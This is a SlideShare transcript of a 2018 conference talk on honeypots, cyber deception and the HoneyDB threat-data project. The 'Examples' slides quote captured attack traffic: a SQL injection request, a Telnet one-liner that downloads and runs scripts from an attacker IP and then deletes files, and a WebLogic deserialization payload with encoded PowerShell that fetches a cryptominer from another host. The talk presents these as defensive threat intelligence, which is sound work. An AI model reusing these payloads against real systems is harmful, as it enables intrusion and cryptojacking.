SlideShare ist ein Scribd-Unternehmen logo

Honeypots, Deception, and Frankenstein

‱
‱
Phillip Maddux
Phillip Maddux

Presented on April 14, 2018 at CarolinaCon (https://www.carolinacon.org). This talk will provide a quick overview honeypots, an explanation of the cyber deception space, and the benefits of implementing deception as part of your cyber defense program. In addition, this talk will highlight the HoneyDB project, which enables anyone to get started with operating deception sensors and start collecting threat information. Finally, this presentation will describe how I built scalable honeypot sensor collection, employing a "Frankenstein Cloud Architecture", for minimal cost.

Technologie
1 von 76
Downloaden Sie, um offline zu lesen
Honeypots, Deception, and Frankenstein CarolinaCon 14
BIO Career Summary ● WebDev, DBA, SA, IT Auditor (~7 yrs) ● AppSec in Financials, EY & GS (~9 yrs) On the socials ● Twitter: @foospidy ● Github: http://github.com/foospidy ● LinkedIn: http://linkedin.pxmx.io ● Blog: http://pxmx.io Phillip Maddux Trusted AppSec Advisor and Senior Solutions Engineer @ Signal Sciences https://signalsciences.com CarolinaCon 14
Community Meet Ups! Conferences!
Community September 29, 2018 https://www.wakeforestdancefestival.org
Agenda of the Cybers ● Honeypots 101 ● Cyber Deception ● HoneyPy - Quick Update ● Frankenstein (HoneyDB Project) ● Q&A
Honeypots 101 A networked computer configured to look like a legitimate system, but its real purpose is to discover and/or track attackers. Types of Honeypots: - Production - Research Levels of Interaction: Low Emulated services, very limited interaction, no login capability (low risk). Medium Emulated services, emulated login, emulated commands. High Actual services, system logins, and commands (very risky).
Honeypots 101 - Production Honeypots Production honeypots are computers on the network that have no legitimate business purpose and should never see any traffic, unless
 - Something is misconfigured on the network - A malicious actor on the network Production honeypots are an additional layer to your defense strategy. - Honeypot logs are low volume and high value - Honeypots introduce risk to the attacker
Honeypots 101 - Production Honeypots Additional Layer to
 Preventative controls - Network & application firewalls - Intrusion prevention systems - Patch management - Network compartmentalization - Anti-virus Detective controls - Intrusion detection systems - Network traffic analysis - Endpoint monitoring Control validation - Vulnerability scans - Audits - Penetration testing - Control performance monitoring Honeypots - Produces low volumes of data compared to the volumes of data from all other preventative and detective controls
Honeypots 101 - Research Honeypots Research honeypots can have many purposes, it just depends on what the research goals are. Examples: - Identify sources of malicious traffic - Discover active malware, botnets, and C&C servers - Learn about attacker techniques & tools
Honeypots 101 - Research Honeypots Bots Scanners Malware DDoS Botnets etc. Internet
Honeypots 101 - Research Honeypots ShmooCon 2015 Andrew Morris (@Andrew___Morris): No Budget Threat Intelligence - Tracking Malware Campaigns on the Cheap - Reversing malware - Uncovering c2 servers - Uncovering imminent ddos attacks Presentation video Now doing really cool stuff with
 (https://greynoise.io/)
Honeypots 101 - Hobbyist Honeypots - Try it out. - It’s fun! This is not me. (this is totally me)
Cyber Deception
The First Rule of Cyber Deception
Image Source You Must Show This Image
Deception Deception technology automates the creation of traps (decoys) and/or lures which are mixed among and within existing IT resources to provide a layer of protection to stop attackers that have penetrated the network. Traps (decoys) are IT assets that either use real licensed operating system software, or are emulations of these devices. [1] 1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
Deception Automation Automation for: - Deploying deception endpoints as VMs, containers, or processes. - Configuration of deception endpoints. Centralized management interface, or API driven.
Deception Lures Lures (aka breadcrumbs) - Lures are generally real information technology resources (files of varying kinds) which are placed on actual IT assets. [1] - Credentials to network resources or applications. - Shortcuts to applications or other services, e.g. FTP, Telnet, SSH. - Browser artifacts, e.g. history, favorites, cookies. - Database connection strings - Network drives - etc. 1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
Deception Solutions Very fancy implementations of honeypots
Deception Layers Network services - SSH, Telnet, FTP, etc. Applications - cookies, directories, logins, functionality, etc. Data - watermarks, triggers, records access, etc.
Deception in Applications 2017 Herb Todd: Tangled Web: Defense in Deception - The goals of deception from the perspective of both the attacker and defender - The elements and processes needed to plan, prepare, execute, and monitor effective deception - The types of deception techniques that are effective and how they translate into actual web application capabilities - How to identify and respond to various types of attackers. Presentation video My takeaway - a tailored solution is needed
See, told ya.
Deception Goal Integrate deception throughout your network and applications so you become a high risk to attackers
Deception Market Approximately 20 companies Raised at least 201 million dollars Top 5 funded range 19 million to 46 million 2 acquisitions All this over the last 4, maybe 5 years Numbers based on data from crunchbase.com as of Fall 2017
Deception Challenges The concept of honeypots & deception has been around for years The Cuckoo’s Egg - 1989 Bsides Raleigh 2017 (now Bsides RDU) source
Deception Challenges Why isn’t everyone already doing deception?
Deception Challenges Maturity
Deception Challenges Over the last 10 to 15 years organizations have focused on getting the basics done
 ● Vulnerability Assessment ● Patch Management ● Endpoint protection ● Network Monitoring (IDS/IPS) ● Controls Validation ● Security awareness / training Deception ● No resources ● Not a priority ● Not fully understood
Deception Challenges However, as organizations are becoming more mature in their security programs they are now thinking about deception
 What does a deception program look like for their organization?
Deception Program Initial thoughts
 ● Scope
 intruder vs. insider, or both? ● Output... alerts vs. counter intelligence, or both? ● Coverage
 external vs. internal, or both? ● Assets
 network, applications, data? ● Validation
 metrics and testing. ● Incident response
 integration and prioritization. Audit & Compliance?
Deception Challenges Some other challenges
 ● Some existing solutions are heavy to deploy. ● Lures & breadcrumb management. ● Vulnerability scans reporting on sensors. ● Deception data risk (data is fake, incident is real). ● External facing deception can have an impact on security scorecard. ● How to implement deception in 3rd party vendor environments.
Deception Takeaways Get the basics covered first Think about your deception story (program) Investigate solutions that are right sized for your organization’s maturity level A solution needs to: - have capability to be tailored - be easy to deploy - be easy to automate and integrate - be light weight / low touch to manage
Deception Takeaways Effective Deception
Project Updates
HoneyPy - Low to medium interaction honeypot. - Plugin based to implement various network services (tcp or udp). - Open source, on Github https://github.com/foospidy/HoneyPy - Written in Python. - Plugins - https://github.com/foospidy/HoneyPy/tree/master/plugins - Service config - https://github.com/foospidy/HoneyPy/blob/master/etc/services.cfg - Integrations (loggers) - https://github.com/foospidy/HoneyPy/tree/master/loggers June Meetup
HoneyDB HoneyDB is a community driven honeypot data aggregation service. HoneyDB collects and publishes honeypot data via its web site and APIs. honeydb.io (redirects to riskdiscovery.com/honeydb)
HoneyDB - Features Data visualization

HoneyDB - Features Investigation

HoneyDB - Features Threat Info API - Bad-hosts - Sensor Data - Twitter Threat Feed Tools
 API Wrapper / CLI https://github.com/foospidy/honeydb-python Console https://github.com/NullArray/Mimir
HoneyDB How does it work?
HoneyDB - Original Architecture Web API
HoneyDB - Scale Problem Web API
HoneyDB - Reliability Problem Fun reading
 http://www.cloudatacost.com/mystory https://www.reddit.com/r/CloudAtCost/
HoneyDB - $$$? Decent web servers and data storage could run about $400-$500 per month. Current 90 day storage 50 GB
HoneyDB - How To Get $$$? Idea
 Honeypots As A Service (HaaS)
HoneyDB - How To Get $$$? Idea
 Honeypots As A Service (HaaS)
HoneyDB - You Have To HaaS it!
HoneyDB - Turns Out
 You Don’t Have To HaaS it! Or nobody wants to HaaS it =(
HoneyDB - But Wait, CarolinaCon Connection! http://novcon.net/ Offered VMs for free! btw
 they also operate the threat info project.
HoneyDB - Reliable Servers But still need to scale
HoneyDB - Frankenstein
HoneyDB - Frankenstein Cloud Architecture “Frankenstein scaaaaaaaaaaaaale” - Frankenstein
HoneyDB - Frankenstein Cloud Architecture
HoneyDB - Frankenstein Cloud Architecture Serverless (functions) Google Cloud BigQuery PubSub Novcon VMs Honeydb web / api MySQL (Secondary) MySQL (Primary) get hmac post events post eventspull events pull tweets TBD replicate query inserts stream events
HoneyDB - What about... Blockchain?
HoneyDB - Blockchain? Not yet.
HoneyDB - Note On Serverless Functions IBM Cloud Functions is THE BEST - deploy easily/quickly, lowest cost. AWS Lambda is good - robust, but expensive
 API gateway charges. Google Cloud Functions is disappointing - easy to deploy, only nodejs, but
 Google functions using Google library talking to Google PubSub resulted in tons of errors. Wait. What? Why? Azure Cloud Functions is WTF - couldn’t get dependencies to install, never got it running, couldn’t waste more time with it.
HoneyDB - Ok, So What Does It Cost?
HoneyDB - Ok, So What Does It Cost?
HoneyDB - How To Money? Cryptocurrency Mining...
HoneyDB - How To Money? Not practical, but wrote a cool script... HoneyMiner https://github.com/foospidy/HoneyMiner
HoneyDB - How To Money? Masternodes
 Greater privacy of transactions Performing immediate transactions Participation in proceedings and voting Activate budgeting and cashier system in cryptocurrencies
HoneyDB - How To Money? Currently running 5 masternodes across 2 VPS Yields about $100 to $200 per month.
HoneyDB - But that crypto though. Masternodes have potential, but requires an initial investment, and at the mercy of market volatility.
HoneyDB - How to money? Other options
 Sponsorships Commercial Licensing
HoneyDB - Back To HaaS Tools to get you honeypotting ● Honeydb-agent ○ Like HoneyPy, but a binary ● API Endpoints ● HoneyDB CLI
HoneyDB - New API Endpoints ● Bad-host (filtered) ● Sensor Data Count (filtered) ● Sensor Data (filtered) Filtered means it’s only the data from your sensors.
HoneyDB - New API Client Wrapper and CLI pip install honeydb usage: honeydb [-h] [--bad-hosts] [--sensor-data-count] [--sensor-data] [--threatbin] [--twitter-threat-feed] [--mydata] [--date DATE] [--ip-address IP_ADDRESS] [--from-id FROM_ID] [--pretty] optional arguments: -h, --help show this help message and exit --bad-hosts Get bad hosts. --sensor-data-count Get sensor data count. --sensor-data Get sensor data. --threatbin Get ThreatBin entries. --twitter-threat-feed Get Twitter Threat Feed. --mydata Filter on mydata. --date DATE Date in format YYYY-MM-DD --ip-address IP_ADDRESS IP address to filter on. --from-id FROM_ID ID to continue retrieving sensor data. --pretty Print JSON in pretty format.
HoneyDB - Examples... Web GET /hcl/inc/install/checkout.asp?cartid1111111111111'%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR (45,120,50,45,81,45)--%20%20 HTTP/1.1 Host: x.x.x.x Accept: */* Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.76.233.99/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.76.233.99 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.76.233.99; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.76.233.99 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
HoneyDB - Examples... POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 64.137.163.142:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0 Connection: Close Content-Type: text/xml Content-Length: 1216 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALg BDAGEAcAB0AGkAbwBuADsAJABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVwBDAC4ASABlAGEAZABlAHIAc wAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAiAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADIALgAwACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQw AuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMwAuADUAOQAuADYAOAAuADEANwAyAC8AQwBhAGMAaABlAC8ARABMAC4 AcABoAHAAJwApADsA</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header>
HoneyDB - Examples... $.O.S.=.(.G.e.t.-.W.m.i.O.b.j.e.c.t. .-.C.l.a.s.s. .W.i.n.3.2._.O.p.e.r.a.t.i.n.g.S.y.s.t.e.m.)...C.a.p.t.i.o.n.;.$.W .C.=.N.e.w.-.O.b.j.e.c.t. .N.e.t...W.e.b.C.l.i.e.n.t.;.$.W.C...H.e.a.d.e.r.s...A.d.d.(.'.U.s .e.r.-.A.g.e.n.t.'.,.".P.o.w.e.r.S.h.e.l.l. .v.2...0. .$.O.S.".).;.I.E.X. .$.W.C...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.'.h.t.t.p.:././.1.2.3...5.9 ...6.8...1.7.2./.C.a.c.h.e./.D.L...p.h.p.'.).;.
HoneyDB - @MalwareMechanic ● I analyzed the initial POST you sent me. From there was I was able to pull apart a scanner/worm/RAT! ● It appears to be GhostMiner to mine Monero!
HoneyDB - Hmmmmm... $ cat GhostMiner >> HoneyMiner
HoneyDB - No no no no...
HoneyDB - @MalwareMechanic ● This POST utilizes a Java deserialization vulnerability to execute a base64 encoded PowerShell command. ● This in turn downloads and executes a PowerShell script (hxxp://123.59.68.172/Cache/DL.php). ● Installs a cryptominer via WMI. ● Attempts to stop the various services & tasks before installing the new miner. ● Attempts to stop other miners. ● Attempts to stop processes listening on specific ports. ● Also saw references to powershell_reflective_mimikatz.
HoneyDB - Go Forth and Honeypot! honeydb.io Thanks! Questions?

Empfohlen

Honeypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinHoneypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinPhillip Maddux
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptxChi En (Ashley) Shen
 
HITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat IntelligenceHITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat IntelligenceJohn Bambenek
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...PROIDEA
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentStefano Maccaglia
 
ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleJohn Bambenek
 
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverCloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverEC-Council
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 

Empfohlen

Honeypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinHoneypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinPhillip Maddux
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptxChi En (Ashley) Shen
 
HITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat IntelligenceHITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat IntelligenceJohn Bambenek
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...PROIDEA
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentStefano Maccaglia
 
ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleJohn Bambenek
 
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverCloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverEC-Council
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeEC-Council
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoJohn Bambenek
 
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksJohn Bambenek
 
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...Chi En (Ashley) Shen
 
PHDAYS: DGAs and Threat Intelligence
PHDAYS: DGAs and Threat IntelligencePHDAYS: DGAs and Threat Intelligence
PHDAYS: DGAs and Threat IntelligenceJohn Bambenek
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksEC-Council
 
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Chetan Khatri
 
Introduction to the Current Threat Landscape
Introduction to the Current Threat LandscapeIntroduction to the Current Threat Landscape
Introduction to the Current Threat LandscapeMelbourne IT
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...EC-Council
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonSSIMeetup
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...EC-Council
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...Andrew Morris
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesJohn Bambenek
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsAndrew Morris
 
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Chetan Khatri
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Hacking Portugal , C-days 2016 , v1.0
Hacking Portugal , C-days 2016 , v1.0Hacking Portugal , C-days 2016 , v1.0
Hacking Portugal , C-days 2016 , v1.0Dinis Cruz
 
Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?Clare Nelson, CISSP, CIPP-E
 
Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)ENOInstitute
 
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...AlienVault
 
Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)Phillip Maddux
 
Security Opportunities A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC PerspectiveSecurity Opportunities A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC PerspectivePositive Hack Days
 

Weitere Àhnliche Inhalte

Was ist angesagt?

Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeEC-Council
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoJohn Bambenek
 
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksJohn Bambenek
 
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...Chi En (Ashley) Shen
 
PHDAYS: DGAs and Threat Intelligence
PHDAYS: DGAs and Threat IntelligencePHDAYS: DGAs and Threat Intelligence
PHDAYS: DGAs and Threat IntelligenceJohn Bambenek
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksEC-Council
 
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Chetan Khatri
 
Introduction to the Current Threat Landscape
Introduction to the Current Threat LandscapeIntroduction to the Current Threat Landscape
Introduction to the Current Threat LandscapeMelbourne IT
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...EC-Council
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonSSIMeetup
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...EC-Council
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...Andrew Morris
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesJohn Bambenek
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsAndrew Morris
 
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Chetan Khatri
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Hacking Portugal , C-days 2016 , v1.0
Hacking Portugal , C-days 2016 , v1.0Hacking Portugal , C-days 2016 , v1.0
Hacking Portugal , C-days 2016 , v1.0Dinis Cruz
 
Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?Clare Nelson, CISSP, CIPP-E
 
Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)ENOInstitute
 
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...AlienVault
 

Was ist angesagt? (20)

Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using Crypto
 
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
 
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
 
PHDAYS: DGAs and Threat Intelligence
PHDAYS: DGAs and Threat IntelligencePHDAYS: DGAs and Threat Intelligence
PHDAYS: DGAs and Threat Intelligence
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael Banks
 
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
 
Introduction to the Current Threat Landscape
Introduction to the Current Threat LandscapeIntroduction to the Current Threat Landscape
Introduction to the Current Threat Landscape
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
 
